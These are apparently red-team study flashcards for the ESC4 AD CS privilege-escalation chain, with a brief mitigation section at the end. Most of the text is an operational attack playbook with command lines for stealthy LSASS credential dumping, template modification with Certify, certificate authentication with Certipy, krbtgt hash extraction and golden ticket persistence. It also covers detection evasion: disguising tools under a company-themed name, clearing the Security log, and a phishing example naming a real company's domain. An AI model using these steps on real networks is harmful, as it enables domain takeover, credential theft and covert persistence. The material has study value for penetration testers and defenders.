ESC4 Flashcards
HandleKatz
Stealthy LSASS credential dumper using handle duplication.
Command: HandleKatz.exe --pid [LSASS_PID] --dumpname C:\lsass.dmp
Use Case: Dump credentials without triggering OpenProcess detection.
SharpKatz
C# tool for credential dumping and Kerberos attacks (Mimikatz alternative).
Commands:
SharpKatz.exe --Command logonpasswords
SharpKatz.exe --Command golden --User fakeadmin …
Certify
Enumerates/modifies AD CS templates and requests certificates.
Commands:
Certify.exe find /vulnerable (Find ESC4 templates)
Certify.exe modify /template:HelpdeskTemplate /altname:admin@domain.com
Certipy
Python-based tool for AD CS exploitation.
Commands:
certipy req … (Request certificate)
certipy auth -pfx admin.pfx (Authenticate with certificate)
Impacket
Python framework for network attacks.
Tools:
secretsdump.py (Dump hashes with Kerberos tickets)
ticketer.py (Generate Golden Tickets)
Credential Dumping (Stealthy)
Method: Use HandleKatz or rundll32 comsvcs.dll to dump LSASS.
Detection Evasion: Avoid direct LSASS handles; parse dumps offline with pypykatz.
Template Modification (ESC4)
Steps:
Find templates with WriteDacl using Certify or BloodHound.
Modify EKU/SAN settings to allow privilege escalation.
Command: Certify.exe modify /template:…
Certificate Authentication
Process: Use certipy auth or SharpKatz to request a TGT with a certificate.
Result: Authenticate as DA without password.
Golden Ticket Persistence
Tools: SharpKatz or ticketer.py.
Key: Requires krbtgt hash (extracted via secretsdump.py).
ESC4 Exploit Chain (Assume Breach)
Initial Access: Phish a low-privileged user (e.g., jdoe@walgreens.com).
Credential Dumping: Use HandleKatz to extract credentials from LSASS.
Recon: Enumerate AD CS servers/templates with Certify.exe find /vulnerable.
Modify Template: Alter HelpdeskTemplate to enable SAN + Client Auth.
Enroll Certificate: Request cert with certipy req or Certify.exe request.
Authenticate: Use certipy auth to get a TGT as administrator.
Dump Hashes: secretsdump.py -k -no-pass to extract krbtgt hash.
Golden Ticket: Create persistence with ticketer.py or SharpKatz.
Cover Tracks: Revert template changes and clear logs.
Evading Detection
Use certreq.exe (native) instead of Certify for enrollment.
Rename tools (e.g., SharpKatz.exe → WalgreenUpdater.exe).
Clear logs: wevtutil cl Security.
Mitigating ESC4
Restrict Permissions: Remove WriteDacl on templates.
Monitor: Alert on Event ID 5136 (AD object modifications).
Harden Templates: Disable Client Authentication EKU where unnecessary.